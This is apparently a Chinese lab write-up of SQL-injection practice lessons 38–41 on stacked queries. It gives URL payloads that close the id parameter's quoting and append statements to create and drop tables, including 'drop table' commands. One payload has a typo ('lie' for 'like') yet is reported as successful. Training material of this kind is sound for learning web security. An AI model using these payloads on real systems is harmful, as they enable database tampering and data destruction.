补充知识:堆叠注入
Lesson 38 GET - Stacked Query injection - string
(1)先测试
SELECT * FROM users WHERE id='1' LIMIT 0,1
显示正常,id值被单引号包裹
加上单引号和注释符
?id=1' --+
(2)构造语句
?id=1'; create table crow2 like users; --+
执行成功
(3)在mysql命令行中查看
插入成功
(4)删除刚创建的表
?id=1'; drop table crow2; --+
执行成功
已成功删除
Lesson 38结束
Lesson 39 GET - Stacked Query injection - Intiger based
(1)先测试
SELECT * FROM users WHERE id=1 LIMIT 0,1
显示正常,id值没有被包裹
(2)直接构造语句
?id=1; create table crow like users;--+
执行成功
(3)删除刚创建好的表
?id=1; drop table crow;--+
执行成功
成功删除
Lesson 39结束
Lesson 40 GET - Blind based - string - stacked
(1)先测试
SELECT * FROM users WHERE id=('1') LIMIT 0,1
显示正常,id值被单引号和括号包裹
加上单引号和单括号 注释符
?id=1') --+
(2)构造语句
?id=1'); create table crow lie users; --+
创建成功
(3)删除表
?id=1'); drop table crow; --+
执行成功
删除成功
Lesson 40结束
Lesson 41 GET - Blind based - Intiger - Stacked
(1)先测试
SELECT * FROM users WHERE id=1 LIMIT 0,1
显示正常,id值没有进行包裹
(2)加上单引号
没有任何回显
前几关,加上相应的会进行报错,所以证明这次的是盲注,只有输入正确的时候才会显示。不过不怎么影响接下来的操作。
(3)构造语句
?id=1; create table crow like users;--+
创建成功
(4)删除表
?id=1; drop table crow;--+
删除成功
Lesson 41结束